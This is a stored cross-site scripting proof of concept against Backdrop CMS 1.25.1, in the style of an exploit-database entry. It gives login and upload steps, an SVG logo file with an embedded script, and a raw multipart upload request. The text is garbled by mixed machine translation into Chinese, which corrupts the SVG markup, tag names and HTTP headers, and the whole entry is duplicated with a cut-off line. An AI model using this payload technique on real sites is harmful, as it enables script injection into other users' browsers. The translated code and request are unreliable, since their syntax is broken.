#Exploit Title:背景CMS V1.25.1-存储的跨站点脚本(XSS)
#Application:背景CMS
#版本: V1.25.1
#BUGS:存储的XSS
#Technology: PHP
#供应商URL: https://backdropcms.org/
#software link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip
#date of uth: 12-07-2023
#作者:MirabbasAğalarov
#Tested On: Linux
2。技术细节POC
====================================================
1。登录帐户
2。转到http://localhost/backdrop/?q=admin/config/config/system/site-information
3。上传SVG文件
'''
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
'''
4。转到SVG文件(http://localhost/Backdrop/files/malas_2.svg)
要求
邮政/背景/?q=admin/config/config/system/site-formation http/1.1
HOST: LOCALHOST
内容长度: 2116
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:多部分/form-data;边界=--- webkitformboundaryvxwrshhm3tvjalpg
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/backdrop/?q=admin/config/config/system/site-information
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
Cookie: Sess31B3AEE8377692AE3F36F0CF7FE0E752=ZUJTSSS2IU5SVCKAFTPKAFTPKAFTPK8ZPAXRNMFEBJ1Q26HXHAH____________E
连接:关闭
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='site_name'
我的背景网站
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='site_slogan'
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='site_mail'
[email protected]
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data; name='files [site_logo_upload]';文件名='malas.svg'
content-type:图像/svg+xml
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='site_logo_path'
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data; name='文件[site_favicon_upload]';文件名=''
content-type:应用程序/钟表流
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='site_favicon_path'
核心/杂项/favicon.ico
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='site_frontPage'
家
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='site_403'
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='site_404'
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='form_build_id'
form-pnr6afekcb5hawh3pdt2j0kkzswh0rdm0qbofgqnj-q
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='form_token'
siowtyeefvg7nedmtyphvz2d3d5u60s38l_crhbnw40
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='form_id'
system_site_information_settings
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='op'
保存配置
------- WebKitform
#Application:背景CMS
#版本: V1.25.1
#BUGS:存储的XSS
#Technology: PHP
#供应商URL: https://backdropcms.org/
#software link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip
#date of uth: 12-07-2023
#作者:MirabbasAğalarov
#Tested On: Linux
2。技术细节POC
====================================================
1。登录帐户
2。转到http://localhost/backdrop/?q=admin/config/config/system/site-information
3。上传SVG文件
'''
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
'''
4。转到SVG文件(http://localhost/Backdrop/files/malas_2.svg)
要求
邮政/背景/?q=admin/config/config/system/site-formation http/1.1
HOST: LOCALHOST
内容长度: 2116
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:多部分/form-data;边界=--- webkitformboundaryvxwrshhm3tvjalpg
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/backdrop/?q=admin/config/config/system/site-information
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
Cookie: Sess31B3AEE8377692AE3F36F0CF7FE0E752=ZUJTSSS2IU5SVCKAFTPKAFTPKAFTPK8ZPAXRNMFEBJ1Q26HXHAH____________E
连接:关闭
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='site_name'
我的背景网站
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='site_slogan'
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='site_mail'
[email protected]
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data; name='files [site_logo_upload]';文件名='malas.svg'
content-type:图像/svg+xml
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='site_logo_path'
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data; name='文件[site_favicon_upload]';文件名=''
content-type:应用程序/钟表流
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='site_favicon_path'
核心/杂项/favicon.ico
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='site_frontPage'
家
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='site_403'
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='site_404'
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='form_build_id'
form-pnr6afekcb5hawh3pdt2j0kkzswh0rdm0qbofgqnj-q
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='form_token'
siowtyeefvg7nedmtyphvz2d3d5u60s38l_crhbnw40
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='form_id'
system_site_information_settings
------ webkitformboundaryvxwrshhm3tvjalpg
content-disposition: form-data;名称='op'
保存配置
------- WebKitform